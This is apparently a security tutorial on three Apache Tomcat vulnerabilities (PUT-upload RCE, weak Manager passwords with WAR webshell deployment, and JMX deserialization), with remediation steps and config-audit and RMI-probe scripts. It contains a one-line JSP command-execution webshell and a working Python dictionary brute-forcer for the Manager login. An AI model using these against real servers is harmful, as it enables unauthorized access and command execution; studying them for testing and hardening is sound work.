
Tomcat backend password brute-forcing script (Python + dictionary): Web middleware vulnerabilities, Tomcat chapter

1

Tomcat overview

Tomcat is a free, open-source web application server. It is a lightweight application server, commonly used for small and medium-sized systems and for sites without many concurrent users, and it is the usual choice for developing and debugging JSP programs.

For a beginner it helps to think of it this way: an Apache HTTP server configured on a machine answers requests for HTML pages (HTML being an application of SGML, the Standard Generalized Markup Language). Tomcat, a separate project of the Apache Software Foundation, serves Java servlets and JSP pages instead. It can be placed behind Apache httpd, but at runtime it is independent: a running Tomcat is a separate process from Apache.

2

Remote Code Execution

Vulnerability Profile and Causes

When Tomcat runs on a Windows host with the HTTP PUT method enabled (the DefaultServlet's readonly parameter set to false), an attacker can upload a JSP file containing arbitrary code with a crafted PUT request and then execute that code by requesting the file. This is the PUT upload issue tracked as CVE-2017-12615.

Affected versions: Apache Tomcat 7.0.0 to 7.0.81

Vulnerability reproduction

Create the vulnerable configuration: enable the PUT method so that files can be uploaded.

Into the DefaultServlet definition in the file under the Tomcat conf/ directory, insert:

    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>

Restart the Tomcat service.

Visit 127.0.0.1:8080, capture the request in Burp and send it to Repeater. Change the request method to PUT and the path to a new .jsp file name, appending a trailing space to the name URL-encoded as %20. The suffix .jsp followed by a space is not matched by the JspServlet's *.jsp mapping, so the DefaultServlet handles the PUT and writes the file, and Windows drops the trailing space when creating it. The request body is:

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

A 201 response means the file was created.

Access the uploaded JSP with the cmd parameter, 127.0.0.1:8080/?cmd=calc

The calculator pops up.

Vulnerability remediation

1) Check whether the running version is in the affected range and disable the PUT method: set the DefaultServlet's readonly parameter back to true (its default) or remove the init-param entirely.

2) Upgrade to the latest version.
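As an added check (example code written for this edit, not from the original post), the following script parses a Tomcat conf/web.xml and reports whether the DefaultServlet is writable, that is, whether the readonly init-param shown above is set to false. The two embedded web.xml fragments are constructed samples: the weak one matches the configuration just described, the other is the corrected form. It mirrors Tomcat's own parsing of the parameter (Boolean.parseBoolean, so only the literal "true" makes the servlet read-only when the parameter is present, and an absent parameter means read-only).

```python
"""Audit a Tomcat conf/web.xml for a writable DefaultServlet (readonly=false).
Added example, not code from the original post."""
import xml.etree.ElementTree as ET

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"

# Constructed sample: the weak configuration the post builds (readonly=false).
WEAK_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
      <param-name>debug</param-name>
      <param-value>0</param-value>
    </init-param>
    <init-param>
      <param-name>readonly</param-name>
      <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>
"""

# Constructed sample: the corrected form (readonly=true, which is also the default).
SAFE_WEB_XML = WEAK_WEB_XML.replace(
    "<param-value>false</param-value>", "<param-value>true</param-value>")


def _local(tag):
    """Strip the XML namespace: '{ns}servlet' -> 'servlet'."""
    return tag.rsplit("}", 1)[-1]


def default_servlet_readonly(web_xml_text):
    """Return the effective readonly setting (True/False) of the DefaultServlet,
    or None if no DefaultServlet is declared in this web.xml.
    Tomcat parses the value with Boolean.parseBoolean: only 'true' (any case)
    is true; a missing parameter leaves the servlet read-only."""
    root = ET.fromstring(web_xml_text)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        servlet_class = ""
        params = {}
        for child in servlet:
            name = _local(child.tag)
            if name == "servlet-class":
                servlet_class = (child.text or "").strip()
            elif name == "init-param":
                kv = {_local(c.tag): (c.text or "").strip() for c in child}
                params[kv.get("param-name")] = kv.get("param-value")
        if servlet_class == DEFAULT_SERVLET:
            value = params.get("readonly")
            if value is None:
                return True
            return value.strip().lower() == "true"
    return None


def is_put_upload_exposed(web_xml_text):
    """True only when the DefaultServlet is explicitly writable."""
    return default_servlet_readonly(web_xml_text) is False


if __name__ == "__main__":
    import sys
    # Pass the path of a real conf/web.xml; otherwise the weak sample is checked.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else WEAK_WEB_XML
    print("PUT upload exposed:", is_put_upload_exposed(text))
```

Run it against conf/web.xml of each instance; the check is cheaper than probing with a real PUT and does not leave a file on the server.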

3

Weak backend password and WAR package deployment

Vulnerability Profile and Causes

The Tomcat Manager backend supports deploying WAR files, so a webshell can be deployed straight into the web directory.

If the backend administration page uses a weak password, the password can be recovered by dictionary brute-forcing.

Vulnerability reproduction

The user configuration under conf in the Tomcat installation directory is as follows:

Visit the backend and log in.

Upload a WAR package containing a JSP backdoor.

The upload is accepted and the WAR is unpacked and parsed; open the deployed JSP.

It executes system commands.

File management is also available, so files can be viewed, deleted and uploaded at will.

Vulnerability remediation

1) Run Tomcat with low privileges on the system: create a dedicated Tomcat service account that has only the minimum set of privileges (for example, no remote login).

2) Add local or certificate-based authentication and deploy an account lockout mechanism (with centralized authentication, configure the directory service accordingly). Set the lockout and timeout limits in the file under CATALINA_HOME/conf/; Tomcat's LockOutRealm, which wraps the user realm in the default configuration, locks an account after a number of failed logins within a time window.

3) Apply least-privilege access restrictions to the manager-gui, manager-status, manager-script and other manager pages: keep the roles separate and grant each account only the role it needs.

4) Do not use weak passwords for the backend.
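The brute-forcing step above is what the title of this post refers to. The script below is an added example written for this edit, not the author's script: it walks a user list and a password list against the Manager login with HTTP Basic authentication. The target URL and the two small dictionaries are assumptions, and FakeOpener is a constructed offline stand-in for urllib's real opener so the logic can be exercised without a server.

```python
"""Dictionary attack on the Tomcat Manager backend login (section 3).
Added example, not code from the original post. Target URL and word lists
are assumptions; FakeOpener is a constructed offline stand-in."""
import base64
import itertools
import urllib.error
import urllib.request


def basic_auth_header(user, password):
    """Tomcat Manager authenticates with HTTP Basic: base64('user:password')."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return "Basic " + token


def probe(url, user, password, opener, timeout=5):
    """Try one credential pair and return the HTTP status.
    401 = rejected; 200 = accepted; 403 = password correct but the account
    lacks the role the page needs (manager-gui for /manager/html)."""
    req = urllib.request.Request(
        url, headers={"Authorization": basic_auth_header(user, password)})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def blast(url, users, passwords, opener):
    """Walk the dictionary; return (user, password, status) for the first pair
    the server does not reject with 401, or None.
    Caveat: a LockOutRealm answers 401 for a locked account even when the
    password is right, so a run that trips the lockout cannot tell locked
    from wrong; the remediation above relies on exactly that."""
    for user, password in itertools.product(users, passwords):
        status = probe(url, user, password, opener)
        if status in (200, 403):
            return (user, password, status)
    return None


class _FakeResponse:
    def __init__(self, status):
        self.status = status

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False


class FakeOpener:
    """Constructed stand-in for urllib.request.build_opener(): accepts exactly
    one Authorization header value and answers 401 to everything else."""

    def __init__(self, valid_header, status_ok=200):
        self.valid_header = valid_header
        self.status_ok = status_ok
        self.attempts = 0

    def open(self, req, timeout=None):
        self.attempts += 1
        if req.get_header("Authorization") == self.valid_header:
            return _FakeResponse(self.status_ok)
        raise urllib.error.HTTPError(req.full_url, 401, "Unauthorized", {}, None)


if __name__ == "__main__":
    import sys
    # Assumed target and dictionaries; pass a URL to run against a real host.
    url = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080/manager/html"
    users = ["tomcat", "admin", "manager"]
    passwords = ["tomcat", "admin", "123456", "s3cret"]
    try:
        print(blast(url, users, passwords, urllib.request.build_opener()))
    except urllib.error.URLError as err:
        print("connection failed:", err.reason)
```

Against a stock server.xml the LockOutRealm locks an account after five failures within 300 seconds for 300 seconds, so a dictionary of any size will mostly be answered 401 after the first few tries; that is the defensive point of remediation item 2, and it is why the script treats a 403 as a hit (correct password, wrong role) rather than continuing.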

4

Deserialization vulnerability

Vulnerability Profile and Causes

This vulnerability (CVE-2016-8735) is related to the JMX deserialization vulnerability Oracle published earlier (CVE-2016-3427) and concerns the listening feature of Tomcat's JmxRemoteLifecycleListener. Remote code execution was possible through the RMI ports opened by that listener because Tomcat did not pick up the fix after Oracle released it.

The root cause is that Tomcat uses JmxRemoteLifecycleListener when JMX monitoring is configured, so the RMI registry and server ports deserialize attacker-controlled objects.

Affected versions:

Apache Tomcat 9.0.0.M1 to 9.0.0.M11

Apache Tomcat 8.5.0 to 8.5.6

Apache Tomcat 8.0.0.RC1 to 8.0.38

Apache Tomcat 7.0.0 to 7.0.72

Apache Tomcat 6.0.0 to 6.0.47

Vulnerability reproduction

Exploitation conditions: the JmxRemoteLifecycleListener ports (10001 and 10002 in this setup) must be reachable from outside for remote code execution.

Configure the ports on which JmxRemoteLifecycleListener listens, at line 30 of the file under conf/ (a Listener element whose className is org.apache.catalina.mbeans.JmxRemoteLifecycleListener, with the rmiRegistryPortPlatform and rmiServerPortPlatform attributes):

Once the JMX ports are configured, download from the extras/ directory of your Tomcat version the catalina- jar that provides the listener (it is not part of the base distribution) and a groovy-2.3 jar, two jars in total, and put them in the lib directory.

Then go to the bin directory and edit the catalina.bat script, adding the JMX startup options line in front of the "Execute The Requested Command" comment.

Restart Tomcat and check that the local RMI service ports 10001 and 10002 are listening, which confirms the listener started.

Construct a payload that pops up the calculator.

The calculator pops up.

Vulnerability remediation

1. Disable JmxRemoteLifecycleListener, or restrict network access to the listener's JMX/RMI ports, and in addition require strict authentication on the JMX endpoint.

2. Upgrade to the fixed version as published in the official advisory.
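Two checks for the exploitation condition above, as an added example written for this edit (not code from the original post): first, parse conf/server.xml and report whether the JmxRemoteLifecycleListener is configured and on which ports; second, send the opening bytes of the Java RMI wire protocol to a port and parse the server's ProtocolAck, which confirms the port is an RMI endpoint (the RMI registry or JMX server) rather than something that merely happens to be open. The server.xml fragment and the sample ack bytes are constructed; the listener ports follow the 10001/10002 used in this post.

```python
"""Checks for the JMX listener exposure in section 4.
Added example, not code from the original post."""
import socket
import struct
import xml.etree.ElementTree as ET

JMX_LISTENER = "org.apache.catalina.mbeans.JmxRemoteLifecycleListener"

# Constructed sample of the relevant part of server.xml (ports as in the post).
SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Listener className="org.apache.catalina.startup.VersionLoggerListener" />
  <Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener"
            rmiRegistryPortPlatform="10001" rmiServerPortPlatform="10002" />
  <Service name="Catalina" />
</Server>
"""


def jmx_listener_ports(server_xml_text):
    """Return (registry_port, server_port) if the listener is configured, else None."""
    root = ET.fromstring(server_xml_text)
    for listener in root.iter("Listener"):
        if listener.get("className") == JMX_LISTENER:
            reg = listener.get("rmiRegistryPortPlatform")
            srv = listener.get("rmiServerPortPlatform")
            return (int(reg) if reg else None, int(srv) if srv else None)
    return None


# RMI transport handshake: the client sends the magic "JRMI", version 2 and the
# StreamProtocol byte 0x4b; an RMI endpoint answers ProtocolAck 0x4e followed
# by an EndpointIdentifier (DataOutput UTF host + int port) naming the client
# address as the server sees it.
RMI_HELLO = b"JRMI" + struct.pack(">HB", 2, 0x4B)
RMI_PROTOCOL_ACK = 0x4E


def parse_rmi_ack(data):
    """Parse a ProtocolAck; return (host, port) or None if this is not RMI."""
    if len(data) < 1 + 2 + 4 or data[0] != RMI_PROTOCOL_ACK:
        return None
    (host_len,) = struct.unpack(">H", data[1:3])
    if len(data) < 3 + host_len + 4:
        return None
    host = data[3:3 + host_len].decode("utf-8", "replace")
    (port,) = struct.unpack(">i", data[3 + host_len:7 + host_len])
    return host, port


def probe_rmi(host, port, timeout=3.0):
    """Network check: returns parse_rmi_ack() of the reply, or None if the
    port is closed, silent, or speaks something other than RMI."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(RMI_HELLO)
            return parse_rmi_ack(sock.recv(256))
    except OSError:
        return None


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        # Assumed usage: probe_rmi.py <host> <port>
        print(probe_rmi(sys.argv[1], int(sys.argv[2])))
    else:
        ports = jmx_listener_ports(SERVER_XML)
        print("JMX listener ports in sample server.xml:", ports)
```

A port that answers the handshake with 0x4e is an RMI endpoint; whether it is actually exploitable still depends on the Tomcat version and on whether the listener was started with authentication, which the protocol handshake alone does not reveal.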
